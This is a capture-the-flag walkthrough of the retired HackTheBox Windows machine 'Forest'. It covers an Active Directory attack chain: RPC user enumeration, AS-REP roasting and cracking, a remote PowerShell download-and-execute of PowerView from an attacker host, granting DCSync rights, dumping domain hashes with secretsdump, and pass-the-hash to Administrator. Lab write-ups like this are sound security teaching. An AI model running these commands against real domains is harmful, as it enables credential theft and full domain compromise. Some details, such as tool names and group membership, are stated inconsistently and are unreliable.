HackTheBox - Forest



OS Difficulty IP Address Status
Windows Easy 10.10.10.161 Retired

This box maybe classified as an easy machine but takes prior knowledge to solve, made by egre55 and mrb3n on HackTheBox. We gain our  foothold by enumerating RPC where we get usernames, then we will Kerberoast the usernames until we get a Kerberos ticket hash, then crack it and get in as the user. For privilege escalation, we will abuse Access Control List-based permission to add a new user, add the new user to a group that will enable us to get the Administrator hash; we will use Pass-The-Hash and login as Administrator.

Phase 1 - Enumeration

Nmap

As usual, we start phase one with nmap, to see what ports are opened.

PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-16 13:35:06Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h30m42s, deviation: 4h02m30s, median: 10m41s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2021-07-16T06:35:20-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-16T13:35:19
|_  start_date: 2021-07-16T07:07:42

A quick glance at the nmap results, we can tell right away that its a Windows machine running Active Directory which indicates that it is a domain controller. Also, the results show that the operating system is Windows Server 2016.

RPC

rpcclient -U  ""  -N 10.10.10.161
rpcclient $>  enumdomusers
...
...
user:[sebastien] rid:[0x479] 
user:[lucinda] rid:[0x47a] 
user:[svc-alfresco] rid:[0x47b] 
user:[andy] rid:[0x47e] 
user:[mark] rid:[0x47f] 
user:[santi] rid:[0x480]

Through RPCClient, we get a few usernames, also one of the user (svc-alfresco) is a Domain Admin, which means that user has higher level privileges.

Phase 2 - Exploitation

AS-REP Roasting with Impacket

So let’s try Impacket’s GetBPUsers.py to see if we can get a Kerberos hash.

python3 GetNPUsers.py --no-pass -dc-ip 10.10.10.161 htb/svc-alfresco

[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:8ae2335d8b1ee8340d19b5577220ba6c$60b28211b189343f297096f45cb5f9fd5e489eeb97873eca43383ed465247259fba7ef471e55bbadbb2659ac590eaf0f15a701e28d74d8f8a15a35770ab9cdfa1b8fb8e66608e5812dfc9068c2bf814df0b9e25f979035a582bdee2e8a5745ef09be73bf2a480b8214b247f33e476da73b385812f3fa21932fbba6bac1bafcc9ccc45cfbf5d7de8c7bd531449ab6984ff3ad01a156932c95970abe9295be6d62a069ce153a3933e7748eda90b737705b993f334463bb374d65ca36054078bdeb94e64aa391bbb2a997c5d

# NOTE: we have intentionally edited the below hash so other HackTheBox players don't copy it and cheat their way to user

Hash Cracking with Hashcat

Since we got a hash, let’s attempt to crack it.

hashcat -m 18200 svc-alfresco.kerb /usr/share/wordlists/rockyou.txt --force

RESULT: s3rvice

Now we have a username and password, let’s login, enumerate the user further to find a way to escalate our privileges.

evil-winrm.rb -i 10.10.10.161 -u svc-alfresco -p s3rvice

Info: Starting Evil-WinRM shell v1.7 
Info: Establishing connection to remote endpoint 
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>

Phase 3 - Privilege Escalation

Using a few different enumeration tools, we came to know that the user ‘svc-alfresco’ who is the part of Domain Admins, is also part of a special DC group called ‘Account Operators.’ Accounts in this special group enables its members to create accounts and add them to the ‘Exchange Windows Permissions Group.’

So, that exactly what we are going to do, we’ll use svc-alfresco to create a new account and add that account to the ‘Exchange Windows Permissions Group.’

# we create a new user account
net user potato 'Potato123' /add /domain
 
# and add the new account to the group
net group "Exchange Windows Permissions" /add potato

ACL-based Escalation

Once our new user in the Exchange Windows Permissions group, we can proceed to abuse the WriteDacl with PowerView to allow the newly created users to gain password hashes of other accounts.

# to copy over PowerView as it contains functions needed
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.89:8000/PowerView.ps1')

# creating a variable for plain password
$pass = ConvertTo-SecureString 'Potato123' -AsPlainText -Force

# encoding our password variable
$cred = New-Object System.Management.Automation.PSCredential('HTB\potato', $pass)

# loading the PowerView script to execute its functions
Import-Module .\PowerView.ps1

# PowerView function to execute ACL-based privilege escalation
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity potato -Rights DCSync

Once the above is ran, we can use Impacket’s SecretsDump.py to dump hashes of all existing users, including the Administrator.

python3 secretsdump.py htb.lcoal/potato:Potato123@10.10.10.161
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up... 

And there we have it, we got the Administrator’s password hash; let’s attempt to login using pass-the-hash instead of cracking the hash.

wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 htb.local/administrator@10.10.10.161

Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation 

[*] SMBv3.0 dialect used 
[!] Launching semi-interactive shell - Careful what you execute 
[!] Press help for extra shell commands 

C:\>whoami  
htb\administrator

We are now Administrator.